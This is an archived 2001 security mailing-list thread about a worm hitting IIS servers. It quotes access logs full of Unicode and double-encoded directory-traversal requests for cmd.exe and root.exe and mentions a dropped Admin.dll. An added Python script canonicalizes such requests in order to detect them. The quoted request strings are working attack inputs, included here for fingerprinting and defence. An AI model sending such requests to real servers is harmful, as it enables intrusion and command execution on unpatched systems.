Re: CodeBlue finally hitting, or what?

From: Eric Jacobsen (jacobsenat_private)
Date: Tue Sep 18 2001 - 08:26:24 PDT


    We're seeing much of the same traffic.  We've recovered a file called
    Admin.dll from the /scripts directory in the web tree.  This file was
    copied there by means of tftp and then executed with a second web request.
    Crude analysis of Admin.dll shows that it's calling itself:
    
    "Concept Virus(CV) V.5, Copyright(C)2001  R.P.China"
    
    I'll provide more information later when I've had a chance to examine
    it more intently.
    
    Eric Jacobsen
    jacobsenat_private
    
    
    "Portnoy, Gary" wrote:
    > 
    > Greetings,
    > 
    > I am suddenly seeing hundreds of Unicode traversal requests coming in from
    > all over the world, many of them from previous CodeRed victims.  I am
    > guessing someone changed CodeBlue to make it spread faster, because before I
    > saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20
    > in the last hour.  Just as a way to help fingerprint it, a few of the
    > attempted exploits use the multiple decode vulnerability...
    > 
    > -Gary-
    > 
    > 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    > 
    > Gary Portnoy
    > Network Administrator
    > gportnoyat_private
    > 
    > PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    
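    Every traversal request in the quoted log resolves to the same file once its encoding is undone, and that is the step a log-side detector has to get right. The Python below is an added example, not code from either poster: it canonicalizes each request target with two percent-decoding passes (which collapse the double-encoded separators such as %255c, %25%35%63 and %%35%63) followed by a lenient two-byte UTF-8 decode that models the over-long forms such as %c0%af and %c1%1c (the decoder is an approximation of the behaviour being exploited, not IIS's own code), then flags any request whose canonical path climbs above the web root or ends in cmd.exe or root.exe. The embedded log lines are constructed from a subset of those in the thread plus one benign request; the function and constant names are the example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: five requests taken from the quoted log plus one benign
# request for contrast.  Apache combined format, as in the original post.
SAMPLE_LOG = """\
12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
10.0.0.7 - - [18/Sep/2001:10:17:05 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_NAMES = ("cmd.exe", "root.exe")


def lenient_utf8(raw: bytes) -> str:
    """Decode like the permissive decoder the over-long traversals relied on.

    Assumption: this models only the two-byte over-long case, not IIS itself.
    A lead byte in 0xC0-0xDF is combined with whatever byte follows, using
    that byte's low six bits whether or not it is a valid continuation byte,
    so %c0%af and %c0%2f become '/', and %c1%1c and %c1%9c become '\\'.
    A strict decoder rejects all four, which is why a filter that decoded
    strictly (or looked for '..\\' literally) saw nothing while the file
    system saw a parent-directory step.
    """
    out = []
    i = 0
    while i < len(raw):
        lead = raw[i]
        if 0xC0 <= lead <= 0xDF and i + 1 < len(raw):
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def canonicalize(target: str, passes: int = 2) -> str:
    """Return the path the server would actually open for a request target.

    Two percent-decoding passes undo the double-encoded forms (%255c,
    %25%35%63 and %%35%63 all end up as '\\'); the lenient UTF-8 pass undoes
    the over-long forms; backslashes are folded to '/' so one check covers both.
    """
    path = target.split("?", 1)[0]
    raw = path.encode("latin-1")  # log text is ASCII; latin-1 round-trips every byte
    for _ in range(passes):
        raw = unquote_to_bytes(raw)
    return lenient_utf8(raw).replace("\\", "/")


def escapes_root(canon: str) -> bool:
    """True if the canonical path climbs above the web root at any point."""
    depth = 0
    for seg in canon.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(line: str):
    """Return a finding dict for a suspicious access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = m.group("target")
    path = target.split("?", 1)[0]
    canon = canonicalize(target)
    # What a naive single-pass, strict decoder would have seen.
    single = unquote_to_bytes(path).decode("latin-1").replace("\\", "/")
    reasons = []
    if escapes_root(canon):
        reasons.append("traversal escapes web root")
        if not escapes_root(single):
            reasons.append("traversal only visible after double or over-long decoding")
    if canon.lower().endswith(SHELL_NAMES):
        reasons.append("request for a command interpreter or backdoor copy")
    if not reasons:
        return None
    return {"target": target, "canonical": canon, "reasons": reasons}


def scan(log_text: str):
    """Classify every line of an access log and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['target']:60} -> {finding['canonical']}")
        for reason in finding["reasons"]:
            print(f"    {reason}")
```

    Run against the constructed sample, the benign index.html request passes and the other five are flagged; the four encoded variants all canonicalize to /scripts/../../winnt/system32/cmd.exe, and the root.exe probe is caught by name since it needs no traversal at all. Matching on the canonical form rather than on the raw request string is what keeps a new encoding trick from slipping past the check.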
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:39:12 PDT